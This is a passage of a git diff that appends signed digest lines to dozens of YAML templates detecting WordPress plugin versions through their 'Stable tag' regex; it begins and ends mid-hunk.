b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204df5c27c45f936a31730ecd5dd0d56e6728549e7c42f6417dcef7df834813dd8022100ff7febd4b441e658555f24695f3375b9a68e577be3491424cf881c2dd5d4298c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..2e3bbc34b8 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207edc3feaebdc9c612318e3bf3f99f46446cb5ffb6c2cbb6ce47ffdd57d731ebc0220243ad26dd5c7efb8ae7fa50074e65d5e3528f04caa37d901414058fefdae7200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..702c2d0fca 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c3ac4145c010c94f838be4110710d710fabee31c429d8ae30701db0bc51c08d0022100925628e8d8dd7a4d0751ad38967f0d9e159915ca9ff28c8ff47d402fb57d4c4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..c8a6cfeb8c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d1ba8b25ff958f5062d8d472b1baca56354b9c837b9d8990de48f3e00eaba1f3022100e6ec5261fd3415791aafd4cd3279f16e9cd2cf88e22de8e6719fb2c622f811f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..3f93b9bae8 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008e383aecead4572f554d064ffd37e4982d0322ee08b43e83f83546f587a54912022100b645b9b272a30b3a98c89259ab572cc937a3a9b92b52e5a08be30a08121d57b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..e08fda36b2 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203866407396a521614a1a8635834868477b9e6bc2195da290ba06c671580f9d9c02200832405a2cbcbea0f721fe6533d9f2953630b1a5cec21bf967036f497f128d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 64cfced6cf..da0c8504eb 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c2771a8b46151758927c570009f75eb37d7d7c927c828792ee5788609cc81428022100fce18061bc29bd092d34eafae98dabba937b805532ce0358ac43754367c258a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..f46a70450e 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100bed9bb5e9d1baa3e147264fe587ec37ad688dd6341e322fb75b445f9c34c2b0702203080cc1f2d41a15738ddee4918cd3d09cb277b992906272f2b1814dee0f5e3ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..3245031f06 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206f9414901f35d97e38dbb96e4970987dc240af1f4f88d1c04b8f4cc3f4b2e134022059eff4be7bdcd40e81863253df5378bb59801c7fef6117dd2a5ea1e6136c10ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..9347868fd7 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210082e8ab43c3e762070954e9d240ee70e1d30b81fe3d82a5c1537a5a8b0f71c443022013a9d7c4b10ec51161b4fbcd59cd6bbc5d3ac78cb7acabecfe3c8de0f0b855aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..eb9183d4c0 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204b7ed8f896ca2f0843e5a4225a38de3e117a132fdb4a3bf08f900f3f579f4c1d02205120e96949aa7d297ab988ffed0eee61a0ac4092fdef039f06137a9f795af44f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..6694a3b44f 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d0e6f4d60137a523b65f4dc1842edee88d9f0fa4974bd11ffb8ad02b29490b1f022032cc1a7d21300acc847a076671555629eb725edbac5495bc836fff659b70e378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..17e8bd9b38 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202489c28ebb9f2bb22809ad06b456ad7f90a673806465a72d0a63b6f9d1692dd1022100d3cfe3a8cf2ef24c13d270885408f23170fa0a600aeb50f1c83087389f5e0c38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..4067a735f5 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022019313b879dd686581ea95de5819e10fe98f003385ba6249ba29513ddb8c21160022076a91581ae93e17885be49c016afc88f6a4a381b7afe4275ad789aefa8eaba75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..5a43f9214f 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202e591f388fdcf07c9f9a4a8d6e9fade7015911da0ccf077725d1662debf8ca06022100e8b62cce86db8b6d8d0149501731ca47a398e0789868118956a65511b408d721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..6fcba19db2 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205c029bc5da637bf939f84cbac1f0c68820a85f9a8760930267ca4cb376618a93022100fdca8959b76c84a6853d338b97574321fd4124dbb6a0ff12ab9e263447978646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4a68323ae1..ec2a1b16d6 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220405326015848c92775979de58ac8885938664f76512e95ca017616d76788048802204c618435277ccd63e00f595a3249fa639d08cab36e3e5d776d3f78f776409876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..959bb671ac 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220605900d015ce7bffdda33e2112b000ddb4c71ce20a4f35b22fb2353f0ee5d3e9022100e975c0e3b927a1e64865d5ee80f5b0a6bbd6ada0be3e8493a936d6542ae35f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..13caa6efe4 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c312551e1707effe50790b46ae9b362da8ddc07e2d4cfb358590ca151482b5ac0221008ec881493d55b60d1df0a7d92fb773bfb0996d3af5099be29b259d4b80fa3e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..aaee59c828 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022076ba2e47242c6918e3a677efa0c3dfe3a898a31dab72036a01d91cb018f4d143022100dc978201ebe3ce6ecaccc8f5d94ec50eb1660a4559b49d3b86459af7364fdfb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..5774cb23bb 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207e492862598685f6c8ed897fb147871331166a6152d42dade35c104ebfb99fd4022100c96f0198cbaff8f6546cb6fb444e58dda3010217d55775cc699b3934e98e823c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..84fb779f38 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100aaa24d085c59aa65e79027b4b6c8cf07cb4a323031a7b3a7c1433a69b569c2d002200288a2a8f5aae0db5f9581508870a5dca8d3bd6b582d1c9b29eaa58c5dccdcd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..1f05b4d72b 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220253b02b1337a1ad1cf41fbd61368d84ff484f224f831eb999eae47894d55552d02200f9b78a36de22e18f97cf822602dc9b9dc2d504e7808eadcd58c08f73822dad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..85a7e9c5b8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100991f2fb88c6447356db10a265bf74a7d1c28ded5fa0a7fdcdb46616706bcc024022100bafe04aae963f829af40de75c69b77b55af9474d4d86d10deeb5c278c0555cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..442f402937 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b2b66561f6973f00d1fcc9e3586b608f253ebaf58799244fd2c50601437fef5f022100f2f3f6a1535d5b37811045b3b77a36aa02aca193f808dacf619f0573833818d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..9446bfa6c0 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022031e42dd3cf51abbc0349a38b290b077d42930284b44c613ef17a50f5c7fb4d8702203d27e575783b563e20346ba0bdfa870b68289b8fd6c5db5a243d0c238eb0dcca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..eb5e82b611 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e4ac169977f28133750c841c8985eebce39e0b5b42ad16a312f8954fe651814c022100bf34f7787ca2c8fa4a73e5623f18b57e7435f252563249cfb9dab4c63ab7cd0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..e6bda1632e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220169417a20c5ab1571216f36c949ddd13faa59eb9cb9a083492bf67db457a24af022100c04cea528c0111b2f9e109cd421890ba533fe5d74a1aa01107ac6b5e202af6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..d5d269886b 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f08a483bdb4ac75abd30cea65cd3a27f7159b616a1cad15e534ffa63705aff9202202df80eb8a6d5312279f59c216d7ac5f8ca60bfb7f565c5304f84307560aa3fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..3aba904108 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a23dab34e2b412c78159caeb0df791de7e958772a459a95013c08a4b9eb4840c022023527a3b44a7702cf303194b4a97401d9fc66404240526f9c6dedf228534c7b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..315b960a0e 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cf619517d2764b4b13c32b5828d293a815094016f1e72d39ca40bcca08982ceb022100a6d1fa5c1d89d7118adeafdc9ce83b1cfb79a21248d142e05946e963a45dce46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..2b63c7e90f 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b32af961336b93eacd46af5a2db08e383ae6be287bc2da352eaca8a29ddcc3e2022100da48ff6a52dc32ee2f76f3405d1bc5ec6fdae94eb7805a8e75ab400f5caf0cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..91104f922f 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220294194b708bc6f5170a2df65285244d5780afe551274213a8b470b2c0ebd86540220150b404eb76aac3894b8b0ee0d566b554bd60cf8400102dd5494ca6cf1abb7fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ed3161d27c..ecb8869561 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022023149226ecc86d35627b69e689e044815a892eb75590ada8e56938719c29b362022100bfdeaa15a7b4b785b023c8e02c28e801494ee3cda2ebf255090eca17a86ba098:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..8c665bf2e6 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c38f67775e6c0a0aa6614439d0b30d971ef33e4c393f4d31c2117a7083a087e9022100aa453516b2bc51bd7a47e46a535a48cf501a2c1339771ee4c1ef844a119dee14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..a8f591bfa0 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200a4a2d26a1e239f2803312503c96164f7d5962caef75a198970ad4827273cdf8022100abdb9710732dbb68cd5dff499b8d221880f402c64be07b305fb9f95b967ff48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..0a48dd7f68 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022077a46c2ae46e4544092ef02086962d9fc0e3e97704ac3849c3fb24e94d5bc226022006278c41280acbe4c824fa2d8282bd876b581e729c62b57f8899e49b0e2fec7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..f937ab086a 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c8b324217af734ef27f3e46e873a39a92b9b6d38bd10f08b5069a108990cfb2402207a673929977eda22f74c9e8d085161a1b4bee88679814a82bea1d8abe5d61f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..5369ca81b0 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206cebe2f6c61fa2c36218c8f6ad2e77ec29651eea82dd1a41bcc9d9151f145832022041da4b3323b8259a3bd11745c0f3585ecba4d852ebb5e2c2615251512eca24e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..cd8d75dcfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203a336bbcacba743252a944de6aa0bb19574e63d15cdeecc74cc628502364228302205ca46efc17afbebe17719b9d6294a105d4de6f1320114c88faf06082cfd0212c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..618f761873 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a0cf2514da7fde0c1913271fe646431da9da7956ba3dcdf16a97a739f3ad17bb02203f051cf3fa42eed824acbd1811b56c4c5060640e98aab276fee7b4fb67926cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index d69709b8f9..7b701b85a7 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100aae316a99383bc8e6dc7d1ca2761393625e84cacb96c763950918e6152dd5d3a022100c49f43ca5ff4436ebd12be8d3c7decbdc494e5956aafd246daf0a799d4c32323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..6ae33db2ee 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d949bc67d571c3fc6492b756b1ebaa33385f35e8648489d79a8a3e1c709cd6b3022100e78184ff76c37bb3586efb695d3f9ac3afa894ce3bc8d1fa09d793a6817647f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..3794a918be 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cb77e39e715727c1422a9594982fcdd5b809ad6c00de6cadbc49add4e2c8cca70221009075af63c1484dab45d95b7f51924d9f4abdba3045b1ddb964b5213d46fbfa7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..5385116d48 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022073640cbdeb4bd4f6165fc32f3bfe39d92d9d1638da88102bcb2924cd5fad1a440221008fe17a3561bf746908cea5fa034c30dc341cfbdb63f181868d5a476f3b09055c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..f57d3f09fe 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e4c269455af789375ab6fb5b25bcd416f8d1b44ba3acf09926c0fe0136b2517c02204f14ea73fc5010a0e2597352009c01d8448bb6f147a8b766466eab0db61b90db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 59a655c424..81e6704f93 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022015879418c9735e6c935b8c115a24b6a1e6890d3522e4df8dd30622d470bbc845022100c27aaf04d7244aba795c16138a8ed055aaaebfbc7c76bb8ffd756a9810fb028c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..c8a9e82dbe 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 